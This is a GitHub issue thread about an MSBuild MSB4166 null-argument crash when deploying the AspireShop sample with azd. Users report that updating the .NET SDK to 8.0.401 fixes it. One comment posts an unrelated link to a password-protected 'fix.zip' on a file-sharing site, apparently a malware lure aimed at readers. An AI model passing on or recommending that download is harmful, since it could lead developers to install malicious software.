### ISSUE TITLE
[WebToolsE2E][Aspire] Deployment of AspireShop failed with error: error MSB4166: System.ArgumentNullException: Value cannot be null. (Parameter 'value')

### ISSUE THREAD

**Issue by v-sherryfan** [dotnet/aspire-samples#441]
**INSTALL STEPS**

1. Clean machine: Win11 x64 23h2 ENU
2. Install VS 17.11.2 [Include Aspire 8.1.0]
3. Install Docker Desktop for Windows
4. Install the latest released azd [1.9.6]

**REPRO STEPS**

1. Clone aspire-samples repo from `main` branch [Aspire 8.1.0]
2. Deploy using azd
    - Open the samples\AspireShop
    - solution folder in a Command Prompt
    - Running `azd init`, select 'Use code in the current directory' > Confirm and continue initializing my app, type a new environment name, press enter.
    - Running `azd up` to deploy to Azure

**ACTUAL:**
ERROR: error executing step command 'deploy --all': failed deploying service 'catalogdbmanager': publishing container: dotnet publish on project 'C:\Users\V-SHER~1\source\repos\aspire-samples\samples\AspireShop\AspireShop.CatalogDbManager\AspireShop.CatalogDbManager.csproj' failed: exit code: 1, stdout: , stderr: MSBUILD : error MSB4166: Child node "2" exited prematurely. Shutting down. Diagnostic information may be found in files in "C:\Users\v-sherryfan\AppData\Local\Temp\MSBuildTemp\" and will be named MSBuild_*.failure.txt. This location can be changed by setting the MSBUILDDEBUGPATH environment variable to a different directory.
MSBUILD : error MSB4166: C:\Users\v-sherryfan\AppData\Local\Temp\MSBuildTemp\MSBuild_pid-22596_166cf785a8f54b07b6697a80d19216cd.failure.txt:
MSBUILD : error MSB4166: UNHANDLED EXCEPTIONS FROM PROCESS 22596:
MSBUILD : error MSB4166: =====================
MSBUILD : error MSB4166: 8/28/2024 9:36:01 AM
MSBUILD : error MSB4166: System.ArgumentNullException: Value cannot be null. (Parameter 'value')
MSBUILD : error MSB4166:    at System.ArgumentNullException.Throw(String paramName)
MSBUILD : error MSB4166:    at System.IO.BinaryWriter.Write(String value)
MSBUILD : error MSB4166:    at Microsoft.Build.Framework.TelemetryEventArgs.WriteToStream(BinaryWriter writer)
MSBUILD : error MSB4166:    at Microsoft.Build.Shared.LogMessagePacketBase.WriteToStream(ITranslator translator)
MSBUILD : error MSB4166:    at Microsoft.Build.Shared.LogMessagePacketBase.Translate(ITranslator translator)
MSBUILD : error MSB4166:    at Microsoft.Build.BackEnd.NodeEndpointOutOfProcBase.RunReadLoop(Stream localReadPipe, Stream localWritePipe, ConcurrentQueue`1 localPacketQueue, AutoResetEvent localPacketAvailable, AutoResetEvent localTerminatePacketPump)
MSBUILD : error MSB4166: ===================
MSBUILD : error MSB4166:
MSBUILD : error MSB4166:
Build failed. Properties, Items, and Target results cannot be obtained. See details in stderr above.
![image](https://github.com/user-attachments/assets/b553107e-8b71-44cd-b755-934634b08423)

**Note**

- If you manually update the Aspire version from 8.1 to 8.2, it will still repro.

**EXPECTED**

Can be published successfully.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by v-sherryfan** [comment]
@chenshupe I don't seem to have permission.
![image](https://github.com/user-attachments/assets/dcc23d4c-fe2f-4527-9fb4-3333c62ec1af)

**Comment by StevieJski** [comment]
I've reproduced this with aspire shop sample. Also saw similar issue deploying my own project.

**Comment by kraldev** [comment]
Any updates on this?

**Comment by StevieJski** [comment]
https://discord.com/channels/732297728826277939/759125320505884752/1278891265961889804
updating  .net sdk from 8.0.400 to 8.0.401 solved this for me

**Comment by v-sherryfan** [comment]
> https://discord.com/channels/732297728826277939/759125320505884752/1278891265961889804 updating .net sdk from 8.0.400 to 8.0.401 solved this for me

Thanks, this workaround is good for me too.

**Comment by scharada** [comment]
updating the sdk did not solve the problem for me...

**Comment by scharada** [comment]
updating SDK to 8.0.401 and Aspire to 8.2.0 solved the issue for me .

**Comment by Dayonel** [comment]
> updating SDK to 8.0.401 and Aspire to 8.2.0 solved the issue for me .

I can't thank you more. I confirm updating SDK to **8.0.401** was the only solution that worked. Thank you!!!

**Comment by v-sherryfan** [comment]
Closed this as not repro on aspire-samples 9.0.0
